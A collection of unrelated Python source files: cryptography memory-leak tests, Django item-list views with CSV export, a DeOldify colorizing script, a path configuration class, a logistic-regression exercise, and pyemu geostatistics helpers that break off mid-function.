])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).add_extension(
aia, critical=False
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
cert.extensions
"""
)
)
def test_write_pkcs12_key_and_certificates(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import os
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import pkcs12
import cryptography_vectors
path = os.path.join('x509', 'custom', 'ca', 'ca.pem')
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_pem_x509_certificate(
f.read(), backend
)
path2 = os.path.join('x509', 'custom', 'dsa_selfsigned_ca.pem')
with cryptography_vectors.open_vector_file(path2, "rb") as f:
cert2 = x509.load_pem_x509_certificate(
f.read(), backend
)
path3 = os.path.join('x509', 'letsencryptx3.pem')
with cryptography_vectors.open_vector_file(path3, "rb") as f:
cert3 = x509.load_pem_x509_certificate(
f.read(), backend
)
key_path = os.path.join("x509", "custom", "ca", "ca_key.pem")
with cryptography_vectors.open_vector_file(key_path, "rb") as f:
key = serialization.load_pem_private_key(
f.read(), None, backend
)
encryption = serialization.NoEncryption()
pkcs12.serialize_key_and_certificates(
b"name", key, cert, [cert2, cert3], encryption)
"""
)
)
|
import csv
from django.contrib.auth.decorators import permission_required
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect, response
from django.urls import reverse
from .models import entry
from .forms import EntryForm
# @permission_required('admin.can_add_log_entry')
def add_item_view(request):
form = EntryForm(request.POST or None)
if form.is_valid():
obj = form.save(commit=False) # Don't save it yet
obj.user = request.user
obj.save()
form = EntryForm()
return redirect('/')
context = {
'form': form
}
return render(request, "addItem.html", context)
# def item_create_view(request):
# my_form = RawEntryForm(request.GET)
# if request.method == "POST":
# my_form = RawEntryForm(request.POST)
# if my_form.is_valid():
# #Now the data is good
# print(my_form.cleaned_data)
# entry.objects.create(**my_form.cleaned_data)
# context = {
# "form": my_form
# }
# return render(request, "addItem.html", context)
# @permission_required('admin.can_add_log_entry')
def delete_item_view(request, id):
obj = get_object_or_404(entry, id=id)
if request.method == "POST":
obj.delete()
return redirect('/')
context = {
"object": obj
}
return render(request, "deleteItem.html", context)
# @permission_required('admin.can_add_log_entry')
def delete_all_item_view(request):
if request.method == "POST":
entry.objects.filter(user=request.user).all().delete()
return redirect('/')
return render(request, "deleteAll.html")
# @permission_required('admin.can_add_log_entry')
def edit_item_view(request, id):
instance = get_object_or_404(entry, id=id)
form = EntryForm(request.POST or None, instance=instance)
if request.method == "POST":
if form.is_valid():
instance.save()
form = EntryForm()
return redirect('/')
context = {
"form": form,
"object": instance
}
return render(request, "editItem.html", context)
# @permission_required('admin.can_add_log_entry')
def entry_download(self):
items = entry.objects.filter(user=self.user).all()
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="items.csv"'
writer = csv.writer(response, delimiter=',')
writer.writerow(['Item', 'Picture_URL', 'Description', 'Price', 'Date', 'URL'])
for obj in items:
writer.writerow([obj.Item, obj.Picture_URL, obj.Description, obj.Price, obj.Date, obj.URL])
return response
|
#NOTE: This must be the first call in order to work properly!
from deoldify import device
from deoldify.device_id import DeviceId
#choices: CPU, GPU0...GPU7
device.set(device=DeviceId.GPU0)
import argparse
parser = argparse.ArgumentParser(description='Inference code to colorize and fix old photos')
parser.add_argument('--artistic', type=bool, help='use artistic mode', default=False)
parser.add_argument('--render_factor', type=int, help='render scale', default=35)
parser.add_argument('--input', type=str, help='input image name', default='test_images/image.png')
parser.add_argument('--output', type=str, help='output image name', default='result_images/output.png')
args = parser.parse_args()
from deoldify.visualize import *
plt.style.use('dark_background')
torch.backends.cudnn.benchmark=True
import warnings
warnings.filterwarnings("ignore", category=UserWarning, message=".*?Your .*? set is empty.*?")
colorizer = get_image_colorizer(artistic=args.artistic)
#NOTE: Max is 45 with 11GB video cards. 35 is a good default
# render_factor=args.render_factor
#NOTE: Make source_url None to just read from file at ./video/source/[file_name] directly without modification
# source_path = args.source_path
result = colorizer.plot_transformed_image(path=args.input, results_dir=None, render_factor=args.render_factor, compare=False)
# 输出在result_imgae/image.png
# print(result)
# show_image_in_notebook(result_path)
# from PIL import Image
# Image.save(result, 'result_images/output.png')
|
"""
This should move into a configparser structure..
"""
__version__ = "0.1"
class Configuration(object):
def __init__(self, program):
self.program = program
self.lastupload = ".uploaded"
# source tree locations
self.sourceDirIsEagle = "/Users/jplocher/Dropbox/eagle/"
self.sourceDirIsControlPoint = "/Users/jplocher/Dropbox/workspace/ArduinoPoint/"
self.sourceDirIsArduino = "/Users/jplocher/Dropbox/Arduino/"
self.sourceDirIsArduinoLibrary = "/Users/jplocher/Dropbox/Arduino/libraries"
self.sourceDirIsCAD = "/Users/jplocher/Dropbox/CAD/"
self.sourceDirIsScript = "/Users/jplocher/Dropbox/Scripts/"
self.sourceDirIsWikiDoc = "/Users/jplocher/Dropbox/WikiDocs/"
self.sourceDirIsExpressPCB = "/Users/jplocher/Dropbox/ExpressPCB/Published/"
self.ARDUINO_LIB_HOME = "/Applications/Arduino.app/Contents/Java/hardware/arduino/avr/libraries/"
self.ARDUINO_USER_LIB_HOME = "/Users/jplocher/Dropbox/Arduino/libraries/"
#self.JEKYLL_GITHUB_PUBLISH_DIR = None
#self.JEKYLL_PUBLISH_PAGES_DIR = "docs/pages/" # relative to parent dir of project..
#self.JEKYLL_PUBLISH_VERSIONS_DIR = "docs/_versions/"
self.JEKYLL_PUBLISH_PAGES_DIR = "pages/" # relative to JEKYLL_GITHUB_PUBLISH_DIR
self.JEKYLL_URL_PAGES_DIR = "/pages/" # absolute URL base for project pages
self.JEKYLL_GITHUB_PUBLISH_DIR_EAGLE = "/Users/jplocher/Dropbox/eagle/SPCoast.github.io/" # or None if local to repo
self.JEKYLL_LOCAL_PUBLISH_DIR_EAGLE = "_versions/"
self.JEKYLL_URL_PUBLISH_DIR_EAGLE = "/versions/" # ... for project versions
self.JEKYLL_GITHUB_PUBLISH_DIR_ARDUINO = "/Users/jplocher/Dropbox/eagle/SPCoast.github.io/" # or None if local to repo
self.JEKYLL_LOCAL_PUBLISH_DIR_ARDUINO = "_sketches/"
self.JEKYLL_URL_PUBLISH_DIR_ARDUINO = "/sketches/" # ... for project versions
|
import numpy as np
def logistic(X, y):
'''
LR Logistic Regression.
INPUT: X: training sample features, P-by-N matrix.
y: training sample labels, 1-by-N row vector.
OUTPUT: w: learned parameters, (P+1)-by-1 column vector.
'''
P, N = X.shape
w = np.zeros((P + 1, 1))
# YOUR CODE HERE
# begin answer
learning_rate = 0.1
# 计算分子
D = np.vstack((np.ones((1, N)), X))
for _ in range(1000):
# 计算分母
exp = np.exp(np.matmul(w.T, D))
delta = np.zeros((P+1, N))
for i in range(N):
delta[:, i] = D[:, i] * exp[0, i] / (1 + exp[0, i]) - D[:, i] * y[0, i]
# 求和
delta = np.sum(delta, axis=1)
if learning_rate * np.linalg.norm(delta) < 0.001:
break
w -= learning_rate * delta.reshape((-1, 1))
# end answer
return w
|
"""High-level functions to help perform complex tasks
"""
from __future__ import print_function, division
import os
import multiprocessing as mp
import warnings
from datetime import datetime
import platform
import struct
import shutil
import copy
import time
from ast import literal_eval
import traceback
import sys
import numpy as np
import pandas as pd
pd.options.display.max_colwidth = 100
from ..pyemu_warnings import PyemuWarning
try:
import flopy
except:
pass
import pyemu
from pyemu.utils.os_utils import run, start_workers
def geostatistical_draws(pst, struct_dict,num_reals=100,sigma_range=4,verbose=True,
scale_offset=True):
"""construct a parameter ensemble from a prior covariance matrix
implied by geostatistical structure(s) and parameter bounds.
Args:
pst (`pyemu.Pst`): a control file (or the name of control file). The
parameter bounds in `pst` are used to define the variance of each
parameter group.
struct_dict (`dict`): a dict of GeoStruct (or structure file), and list of
pilot point template files pairs. If the values in the dict are
`pd.DataFrames`, then they must have an 'x','y', and 'parnme' column.
If the filename ends in '.csv', then a pd.DataFrame is loaded,
otherwise a pilot points file is loaded.
num_reals (`int`, optional): number of realizations to draw. Default is 100
sigma_range (`float`): a float representing the number of standard deviations
implied by parameter bounds. Default is 4.0, which implies 95% confidence parameter bounds.
verbose (`bool`, optional): flag to control output to stdout. Default is True.
flag for stdout.
scale_offset (`bool`,optional): flag to apply scale and offset to parameter bounds
when calculating variances - this is passed through to `pyemu.Cov.from_parameter_data()`.
Default is True.
Returns
`pyemu.ParameterEnsemble`: the realized parameter ensemble.
Note:
parameters are realized by parameter group. The variance of each
parameter group is used to scale the resulting geostatistical
covariance matrix Therefore, the sill of the geostatistical structures
in `struct_dict` should be 1.0
Example::
pst = pyemu.Pst("my.pst")
sd = {"struct.dat":["hkpp.dat.tpl","vka.dat.tpl"]}
pe = pyemu.helpers.geostatistical_draws(pst,struct_dict=sd}
pe.to_csv("my_pe.csv")
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
assert isinstance(pst, pyemu.Pst), "pst arg must be a Pst instance, not {0}". \
format(type(pst))
if verbose: print("building diagonal cov")
full_cov = pyemu.Cov.from_parameter_data(pst, sigma_range=sigma_range,
scale_offset=scale_offset)
full_cov_dict = {n: float(v) for n, v in zip(full_cov.col_names, full_cov.x)}
# par_org = pst.parameter_data.copy # not sure about the need or function of this line? (BH)
par = pst.parameter_data
par_ens = []
pars_in_cov = set()
keys = list(struct_dict.keys())
keys.sort()
for gs in keys:
items = struct_dict[gs]
if verbose: print("processing ", gs)
if isinstance(gs, str):
gss = pyemu.geostats.read_struct_file(gs)
if isinstance(gss, list):
warnings.warn("using first geostat structure in file {0}". \
format(gs), PyemuWarning)
gs = gss[0]
else:
gs = gss
if gs.sill != 1.0:
warnings.warn("GeoStruct {0} sill != 1.0 - this is bad!".format(gs.name))
if not isinstance(items, list):
items = [items]
# items.sort()
for iitem,item in enumerate(items):
if isinstance(item, str):
assert os.path.exists(item), "file {0} not found". \
format(item)
if item.lower().endswith(".tpl"):
df = pyemu.pp_utils.pp_tpl_to_dataframe(item)
elif item.lower.endswith(".csv"):
df = pd.read_csv(item)
else:
df = item
if "pargp" in df.columns:
if verbose: print("working on pargroups {0}".format(df.pargp.unique().tolist()))
for req in ['x', 'y', 'parnme']:
if req not in df.columns:
raise Exception("{0} is not in the columns".format(req))
missing = df.loc[df.parnme.apply(
lambda x: x not in par.parnme), "parnme"]
if len(missing) > 0:
warnings.warn("the following parameters are not " + \
"in the control file: {0}". \
format(','.join(missing)), PyemuWarning)
df = df.loc[df.parnme.apply(lambda x: x not in missing)]
if df.shape[0] == 0:
warnings.warn("geostatistical_draws(): empty parameter df at position {0} items for geostruct {1}, skipping...".\
format(iitem,gs))
continue
if "zone" not in df.columns:
df.loc[:, "zone"] = 1
zones = df.zone.unique()
aset = set(pst.adj_par_names)
for zone in zones:
df_zone = df.loc[df.zone == zone, :].copy()
df_zone = df_zone.loc[df_zone.parnme.apply(lambda x: x in aset), :]
if df_zone.shape[0] == 0:
warnings.warn("all parameters in zone {0} tied and/or fixed, skipping...".format(zone),
PyemuWarning)
continue
# df_zone.sort_values(by="parnme",inplace=True)
df_zone.sort_index(inplace=True)
if verbose: print("build cov matrix")
cov = gs.covariance_matrix(df_zone.x, df_zone.y, df_zone.parnme)
if verbose: print("done")
if verbose: print("getting diag var cov", df_zone.shape[0])
# tpl_var = np.diag(full_cov.get(list(df_zone.parnme)).x).max()
tpl_var = max([full_cov_dict[pn] for pn in df_zone.parnme])
if verbose: print("scaling full cov by diag var cov")
# cov.x *= tpl_var
for i in range(cov.shape[0]):
cov.x[i, :] *= tpl_var
# no fixed values here
pe = pyemu.ParameterEnsemble.from_gaussian_draw(pst=pst, cov=cov, num_reals=num_reals,
by_groups=False, fill=False)
# df = pe.iloc[:,:]
par_ens.append(pe._df)
pars_in_cov.update(set(pe.columns))
if verbose: print("adding remaining parameters to diagonal")
fset = set(full_cov.row_names)
diff = list(fset.difference(pars_in_cov))
if (len(diff) > 0):
name_dict = {name: i for i, name in enumerate(full_cov.row_names)}
vec = np.atleast_2d(np.array([full_cov.x[name_dict[d]] for d in diff]))
cov = pyemu.Cov(x=vec, names=diff, isdiagonal=True)
# cov = full_cov.get(diff,diff)
# here we fill in the fixed values
pe = pyemu.ParameterEnsemble.from_gaussian_draw(pst, cov, num_reals=num_reals,
fill=False)
par_ens.append(pe._df)
par_ens = pd.concat(par_ens, axis=1)
par_ens = pyemu.ParameterEnsemble(pst=pst, df=par_ens)
return par_ens
def geostatistical_prior_builder(pst, struct_dict, sigma_range=4,
verbose=False, scale_offset=False):
"""construct a full prior covariance matrix using geostastical structures
and parameter bounds information.
Args:
pst (`pyemu.Pst`): a control file instance (or the name of control file)
struct_dict (`dict`): a dict of GeoStruct (or structure file), and list of
pilot point template files pairs. If the values in the dict are
`pd.DataFrames`, then they must have an 'x','y', and 'parnme' column.
If the filename ends in '.csv', then a pd.DataFrame is loaded,
otherwise a pilot points file is loaded.
sigma_range (`float`): a float representing the number of standard deviations
implied by parameter bounds. Default is 4.0, which implies 95% confidence parameter bounds.
verbose (`bool`, optional): flag to control output to stdout. Default is True.
flag for stdout.
scale_offset (`bool`): a flag to apply scale and offset to parameter upper and lower bounds
before applying log transform. Passed to pyemu.Cov.from_parameter_data(). Default
is False
Returns:
`pyemu.Cov`: a covariance matrix that includes all adjustable parameters in the control
file.
Note:
The covariance of parameters associated with geostatistical structures is defined
as a mixture of GeoStruct and bounds. That is, the GeoStruct is used to construct a
pyemu.Cov, then the entire pyemu.Cov is scaled by the uncertainty implied by the bounds and
sigma_range. Most users will want to sill of the geostruct to sum to 1.0 so that the resulting
covariance matrices have variance proportional to the parameter bounds. Sounds complicated...
Example::
pst = pyemu.Pst("my.pst")
sd = {"struct.dat":["hkpp.dat.tpl","vka.dat.tpl"]}
cov = pyemu.helpers.geostatistical_draws(pst,struct_dict=sd}
cov.to_binary("prior.jcb")
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
assert isinstance(pst, pyemu.Pst), "pst arg must be a Pst instance, not {0}". \
format(type(pst))
if verbose: print("building diagonal cov")
full_cov = pyemu.Cov.from_parameter_data(pst, sigma_range=sigma_range,
scale_offset=scale_offset)
full_cov_dict = {n: float(v) for n, v in zip(full_cov.col_names, full_cov.x)}
# full_cov = None
par = pst.parameter_data
for gs, items in struct_dict.items():
if verbose: print("processing ", gs)
if isinstance(gs, str):
gss = pyemu.geostats.read_struct_file(gs)
if isinstance(gss, list):
warnings.warn("using first geostat structure in file {0}". \
format(gs), PyemuWarning)
gs = gss[0]
else:
gs = gss
if gs.sill != 1.0:
warnings.warn("geostatistical_prior_builder() warning: geostruct sill != 1.0, user beware!")
if not isinstance(items, list):
items = [items]
for item in items:
if isinstance(item, str):
assert os.path.exists(item), "file {0} not found". \
format(item)
if item.lower().endswith(".tpl"):
df = pyemu.pp_utils.pp_tpl_to_dataframe(item)
elif item.lower.endswith(".csv"):
df = pd.read_csv(item)
else:
df = item
for req in ['x', 'y', 'parnme']:
if req not in df.columns:
raise Exception("{0} is not in the columns".format(req))
missing = df.loc[df.parnme.apply(
lambda x: x not in par.parnme), "parnme"]
if len(missing) > 0:
warnings.warn("the following parameters are not " + \
"in the control file: {0}". \
format(','.join(missing)), PyemuWarning)
df = df.loc[df.parnme.apply(lambda x: x not in missing)]
if "zone" not in df.columns:
df.loc[:, "zone"] = 1
zones = df.zone.unique()
aset = set(pst.adj_par_names)
for zone in zones:
df_zone = df.loc[df.zone == zone, :].copy()
df_zone = df_zone.loc[df_zone.parnme.apply(lambda x: x in aset), :]
if df_zone.shape[0] == 0:
warnings.warn("all parameters in zone {0} tied and/or fixed, skipping...".format(zone),
PyemuWarning)
continue
# df_zone.sort_values(by="parnme",inplace=True)
df_zone.sort_index(inplace=True)
if verbose: print("build cov matrix")
cov = gs.covariance_matrix(df_zone.x, df_zone.y, df_zone.parnme)
if verbose: print("done")
# find the variance in the diagonal cov
if verbose: print("getting diag var cov", df_zone.shape[0])
# tpl_var = np.diag(full_cov.get(list(df_zone.parnme)).x).max()
tpl_var = max([full_cov_dict[pn] for pn in df_zone.parnme])
# if np.std(tpl_var) > 1.0e-6:
# warnings.warn("pars have different ranges" +\
# " , using max range as variance for all pars")
# tpl_var = tpl_var.max()
if verbose: print("scaling full cov by diag var cov")
cov *= tpl_var
if verbose: print("test for inversion")
try:
ci = cov.inv
except:
df_zone.to_csv("prior_builder_crash.csv")
raise Exception("error inverting cov {0}".
format(cov.row_names[:3]))
if verbose: print('replace in full cov')
full_cov.replace(cov)
# d = np.diag(full_cov.x)
# idx = np.argwhere(d==0.0)
# for i in idx:
# print(full_cov.names[i])
return full_cov
def _rmse(v1, v2):
"""return root mean squared error between v1 and v2
Args:
v1 (iterable): one vector
v2 (iterable): another vector
Returns:
scalar: root mean squared error of v1,v2
"""
return np.sqrt(np.mean(np.square(v1-v2)))
def calc_observation_ensemble_quantiles(ens, pst, quantiles, subset_obsnames=None, subset_obsgroups=None):
"""Given an observation ensemble, and requested quantiles, this function calculates the requested
quantile point-by-point in the ensemble. This resulting set of values does not, however, correspond
to a single realization in the ensemble. So, this function finds the minimum weighted squared
distance to the quantile and labels it in the ensemble. Also indicates which realizations
correspond to the selected quantiles.
Args:
ens (pandas DataFrame): DataFrame read from an observation
pst (pyemy.Pst object) - needed to obtain observation weights
quantiles (iterable): quantiles ranging from 0-1.0 for which results requested
subset_obsnames (iterable): list of observation names to include in calculations
subset_obsgroups (iterable): list of observation groups to include in calculations
Returns:
ens (pandas DataFrame): same ens object that was input but with quantile realizations
appended as new rows labelled with 'q_#' where '#' is the slected quantile
quantile_idx (dictionary): dictionary with keys being quantiles and values being realizations
corresponding to each realization
"""
#TODO: handle zero weights due to PDC
quantile_idx = {}
# make sure quantiles and subset names and groups are lists
if not isinstance(quantiles, list):
quantiles = list(quantiles)
if not isinstance(subset_obsnames, list) and subset_obsnames is not None:
subset_obsnames = list(subset_obsnames)
if not isinstance(subset_obsgroups, list) and subset_obsgroups is not None:
subset_obsgroups = list(subset_obsgroups)
if 'real_name' in ens.columns:
ens.set_index('real_name')
# if 'base' real was lost, then the index is of type int. needs to be string later so set here
ens.index = [str(i) for i in ens.index]
if not isinstance(pst, pyemu.Pst):
raise Exception('pst object must be of type pyemu.Pst')
# get the observation data
obs = pst.observation_data.copy()
# confirm that the indices and weights line up
if False in np.unique(ens.columns == obs.index):
raise Exception('ens and pst observation names do not align')
# deal with any subsetting of observations that isn't handled through weights
trimnames = obs.index.values
if subset_obsgroups is not None and subset_obsnames is not None:
raise Exception('can only specify information in one of subset_obsnames of subset_obsgroups. not both')
if subset_obsnames is not None:
trimnames = subset_obsnames
if len(set(trimnames) - set(obs.index.values)) != 0:
raise Exception('the following names in subset_obsnames are not in the ensemble:\n' +
['{}\n'.format(i) for i in (set(trimnames) - set(obs.index.values))])
if subset_obsgroups is not None:
if len((set(subset_obsgroups) - set(pst.obs_groups))) != 0:
raise Exception('the following groups in subset_obsgroups are not in pst:\n' +
['{}\n'.format(i) for i in (set(subset_obsgroups) - set(pst.obs_groups))])
trimnames = obs.loc[obs.obgnme.isin(subset_obsgroups)].obsnme.tolist()
if len((set(trimnames) - set(obs.index.values))) != 0:
raise Exception('the following names in subset_obsnames are not in the ensemble:\n' +
['{}\n'.format(i) for i in (set(trimnames) - set(obs.index.values))])
# trim the data to subsets (or complete )
ens_eval = ens[trimnames].copy()
weights = obs.loc[trimnames].weight.values
for cq in quantiles:
# calculate the point-wise quantile values
qfit = np.quantile(ens_eval, cq, axis=0)
# calculate the weighted distance between all reals and the desired quantile
qreal = np.argmin(np.linalg.norm([(i - qfit)*weights for i in ens_eval.values], axis=1))
quantile_idx['q{}'.format(cq)] = qreal
ens = ens.append(ens.iloc[qreal])
idx = ens.index.values
idx[-1] = 'q{}'.format(cq)
ens.set_index(idx, inplace=True)
return ens, quantile_idx
def calc_rmse_ensemble(ens, pst, bygroups=True, subset_realizations=None):
"""Calculates RMSE (without weights) to quantify fit to observations for ensemble members
Args:
ens (pandas DataFrame): DataFrame read from an observation
pst (pyemy.Pst object) - needed to obtain observation weights
bygroups (Bool): Flag to summarize by groups or not. Defaults to True.
subset_realizations (iterable, optional): Subset of realizations for which
to report RMSE. Defaults to None which returns all realizations.
Returns:
rmse (pandas DataFrame object): rows are realizations. Columns are groups. Content is RMSE
"""
#TODO: handle zero weights due to PDC
# make sure subset_realizations is a list
if not isinstance(subset_realizations, list) and subset_realizations is not None:
subset_realizations = list(subset_realizations)
if 'real_name' in ens.columns:
ens.set_index('real_name')
if not isinstance(pst, pyemu.Pst):
raise Exception('pst object must be of type pyemu.Pst')
# get the observation data
obs = pst.observation_data.copy()
# confirm that the indices and observations line up
if False in np.unique(ens.columns == obs.index):
raise Exception('ens and pst observation names do not align')
rmse = pd.DataFrame(index=ens.index)
if subset_realizations is not None:
rmse = rmse.loc[subset_realizations]
# calculate the rmse total first
rmse['total'] = [_rmse(ens.loc[i], obs.obsval) for i in rmse.index]
# if bygroups, do the groups as columns
if bygroups is True:
for cg in obs.obgnme.unique():
cnames = obs.loc[obs.obgnme == cg].obsnme
rmse[cg] = [_rmse(ens.loc[i][cnames], obs.loc[cnames].obsval) for i in rmse.index]
return rmse
def _condition_on_par_knowledge(cov, par_knowledge_dict):
""" experimental function to include conditional prior information
for one or more parameters in a full covariance matrix
"""
missing = []
for parnme in par_knowledge_dict.keys():
if parnme not in cov.row_names:
missing.append(parnme)
if len(missing):
raise Exception("par knowledge dict parameters not found: {0}". \
format(','.join(missing)))
# build the selection matrix and sigma epsilon
# sel = pyemu.Cov(x=np.identity(cov.shape[0]),names=cov.row_names)
sel = cov.zero2d
sel = cov.to_pearson()
new_cov_diag = pyemu.Cov(x=np.diag(cov.as_2d.diagonal()), names=cov.row_names)
# new_cov_diag = cov.zero2d
for parnme, var in par_knowledge_dict.items():
idx = cov.row_names.index(parnme)
# sel.x[idx,:] = 1.0
# sel.x[idx,idx] = var
new_cov_diag.x[idx, idx] = var # cov.x[idx,idx]
new_cov_diag = sel * new_cov_diag * sel.T
for _ in range(2):
for parnme, var in par_knowledge_dict.items():
idx = cov.row_names.index(parnme)
# sel.x[idx,:] = 1.0
# sel.x[idx,idx] = var
new_cov_diag.x[idx, idx] = var # cov.x[idx,idx]
new_cov_diag = sel * new_cov_diag * sel.T
print(new_cov_diag)
return new_cov_diag
def kl_setup(num_eig, sr, struct, prefixes,
factors_file="kl_factors.dat",
islog=True, basis_file=None,
tpl_dir="."):
"""setup a karhuenen-Loeve based parameterization for a given
geostatistical structure.
Args:
num_eig (`int`): the number of basis vectors to retain in the
reduced basis
sr (`flopy.reference.SpatialReference`): a spatial reference instance
struct (`str`): a PEST-style structure file. Can also be a
`pyemu.geostats.Geostruct` instance.
prefixes ([`str`]): a list of parameter prefixes to generate KL
parameterization for.
factors_file (`str`, optional): name of the PEST-style interpolation
factors file to write (can be processed with FAC2REAL).
Default is "kl_factors.dat".
islog (`bool`, optional): flag to indicate if the parameters are log transformed.
Default is True
basis_file (`str`, optional): the name of the PEST-style binary (e.g. jco)
file to write the reduced basis vectors to. Default is None (not saved).
tpl_dir (`str`, optional): the directory to write the resulting
template files to. Default is "." (current directory).
Returns:
`pandas.DataFrame`: a dataframe of parameter information.
Note:
This is the companion function to `helpers.apply_kl()`
Example::
m = flopy.modflow.Modflow.load("mymodel.nam")
prefixes = ["hk","vka","ss"]
df = pyemu.helpers.kl_setup(10,m.sr,"struct.dat",prefixes)
"""
try:
import flopy
except Exception as e:
raise Exception("error import flopy: {0}".format(str(e)))
assert isinstance(sr, flopy.utils.SpatialReference)
# for name,array in array_dict.items():
# assert isinstance(array,np.ndarray)
# assert array.shape[0] == sr.nrow
# assert array.shape[1] == sr.ncol
# assert len(name) + len(str(num_eig)) <= 12,"name too long:{0}".\
# format(name)
if isinstance(struct, str):
assert os.path.exists(struct)
gs = pyemu.utils.read_struct_file(struct)
else:
gs = struct
names = []
for i in range(sr.nrow):
names.extend(["i{0:04d}j{1:04d}".format(i, j) for j in range(sr.ncol)])
cov = gs.covariance_matrix(sr.xcentergrid.flatten(),
sr.ycentergrid.flatten(),
names=names)
eig_names = ["eig_{0:04d}".format(i) for i in range(cov.shape[0])]
trunc_basis = cov.u
trunc_basis.col_names = eig_names
# trunc_basis.col_names = [""]
if basis_file is not None:
trunc_basis.to_binary(basis_file)
trunc_basis = trunc_basis[:, :num_eig]
eig_names = eig_names[:num_eig]
pp_df = pd.DataFrame({"name": eig_names}, index=eig_names)
pp_df.loc[:, "x"] = -1.0 * sr.ncol
pp_df.loc[:, "y"] = -1.0 * sr.nrow
pp_df.loc[:, "zone"] = -999
pp_df.loc[:, "parval1"] = 1.0
pyemu.pp_utils.write_pp_file(os.path.join("temp.dat"), pp_df)
_eigen_basis_to_factor_file(sr.nrow, sr.ncol, trunc_basis,
factors_file=factors_file, islog=islog)
dfs = []
for prefix in prefixes:
tpl_file = os.path.join(tpl_dir, "{0}.dat_kl.tpl".format(prefix))
df = pyemu.pp_utils.pilot_points_to_tpl("temp.dat", tpl_file, prefix)
shutil.copy2("temp.dat", tpl_file.replace(".tpl", ""))
df.loc[:, "tpl_file"] = tpl_file
df.loc[:, "in_file"] = tpl_file.replace(".tpl", "")
df.loc[:, "prefix"] = prefix
df.loc[:, "pargp"] = "kl_{0}".format(prefix)
dfs.append(df)
# arr = pyemu.geostats.fac2real(df,factors_file=factors_file,out_file=None)
df = pd.concat(dfs)
df.loc[:, "parubnd"] = 10.0
df.loc[:, "parlbnd"] = 0.1
return pd.concat(dfs)
# back_array_dict = {}
# f = open(tpl_file,'w')
# f.write("ptf ~\n")
# f.write("name,org_val,new_val\n")
# for name,array in array_dict.items():
# mname = name+"mean"
# f.write("{0},{1:20.8E},~ {2} ~\n".format(mname,0.0,mname))
# #array -= array.mean()
# array_flat = pyemu.Matrix(x=np.atleast_2d(array.flatten()).transpose()
# ,col_names=["flat"],row_names=names,
# isdiagonal=False)
# factors = trunc_basis * array_flat
# enames = ["{0}{1:04d}".format(name,i) for i in range(num_eig)]
# for n,val in zip(enames,factors.x):
# f.write("{0},{1:20.8E},~ {0} ~\n".format(n,val[0]))
# back_array_dict[name] = (factors.T * trunc_basis).x.reshape(array.shape)
# print(array_back)
# print(factors.shape)
#
# return back_array_dict
def _eigen_basis_to_factor_file(nrow, ncol, basis, factors_file, islog=True):
assert nrow * ncol == basis.shape[0]
with open(factors_file, 'w') as f:
f.write("junk.dat\n")
f.write("junk.zone.dat\n")
f.write("{0} {1}\n".format(ncol, nrow))
f.write("{0}\n".format(basis.shape[1]))
[f.write(name + "\n") for name in basis.col_names]
t = 0
if islog:
t = 1
for i in range(nrow * ncol):
f.write("{0} {1} {2} {3:8.5e}".format(i + 1, t, basis.shape[1], 0.0))
[f.write(" {0} {1:12.8g} ".format(i + 1, w)) for i, w in enumerate(basis.x[i, :])]
f.write("\n")
def kl_apply(par_file, basis_file, par_to_file_dict, arr_shape):
""" Apply a KL parameterization transform from basis factors to model
input arrays.
Args:
par_file (`str`): the csv file to get factor values from. Must contain
the following columns: "name", "new_val", "org_val"
basis_file (`str`): the PEST-style binary file that contains the reduced
basis
par_to_file_dict (`dict`): a mapping from KL parameter prefixes to array
file names.
arr_shape (tuple): a length 2 tuple of number of rows and columns
the resulting arrays should have.
Note:
This is the companion function to kl_setup.
This function should be called during the forward run
"""
df = pd.read_csv(par_file)
assert "name" in df.columns
assert "org_val" in df.columns
assert "new_val" in df.columns
df.loc[:, "prefix"] = df.name.apply(lambda x: x[:-4])
for prefix in df.prefix.unique():
assert prefix in par_to_file_dict.keys(), "missing prefix:{0}". \
format(prefix)
basis = pyemu.Matrix.from_binary(basis_file)
assert basis.shape[1] == arr_shape[0] * arr_shape[1]
arr_min = 1.0e-10 # a temp hack
# means = df.loc[df.name.apply(lambda x: x.endswith("mean")),:]
# print(means)
df = df.loc[df.name.apply(lambda x: not x.endswith("mean")), :]
for prefix, filename in par_to_file_dict.items():
factors = pyemu.Matrix.from_dataframe(df.loc[df.prefix == prefix, ["new_val"]])
factors.autoalign = False
basis_prefix = basis[:factors.shape[0], :]
arr = (factors.T * basis_prefix).x.reshape(arr_shape)
# arr += means.loc[means.prefix==prefix,"new_val"].values
arr[arr < arr_min] = arr_min
np.savetxt(filename, arr, fmt="%20.8E")
def zero_order_tikhonov(pst, parbounds=True, par_groups=None,
reset=True):
"""setup preferred-value regularization in a pest control file.
Args:
pst (`pyemu.Pst`): the control file instance
parbounds (`bool`, optional): flag to weight the new prior information
equations according to parameter bound width - approx the KL
transform. Default is True
par_groups (`list`): a list of parameter groups to build PI equations for.
If None, all adjustable parameters are used. Default is None
reset (`bool`): a flag to remove any existing prior information equations
in the control file. Default is True
Example::
pst = pyemu.Pst("my.pst")
pyemu.helpers.zero_order_tikhonov(pst)
pst.write("my_reg.pst")
"""
if par_groups is None:
par_groups = pst.par_groups
pilbl, obgnme, weight, equation = [], [], [], []
for idx, row in pst.parameter_data.iterrows():
pt = row["partrans"].lower()
try:
pt = pt.decode()
except:
pass
if pt not in ["tied", "fixed"] and \
row["pargp"] in par_groups:
pilbl.append(row["parnme"])
weight.append(1.0)
ogp_name = "regul" + row["pargp"]
obgnme.append(ogp_name[:12])
parnme = row["parnme"]
parval1 = row["parval1"]
if pt == "log":
parnme = "log(" + parnme + ")"
parval1 = np.log10(parval1)
eq = "1.0 * " + parnme + " ={0:15.6E}".format(parval1)
equation.append(eq)
if reset:
pst.prior_information = pd.DataFrame({"pilbl": pilbl,
"equation": equation,
"obgnme": obgnme,
"weight": weight})
else:
pi = pd.DataFrame({"pilbl": pilbl,
"equation": equation,
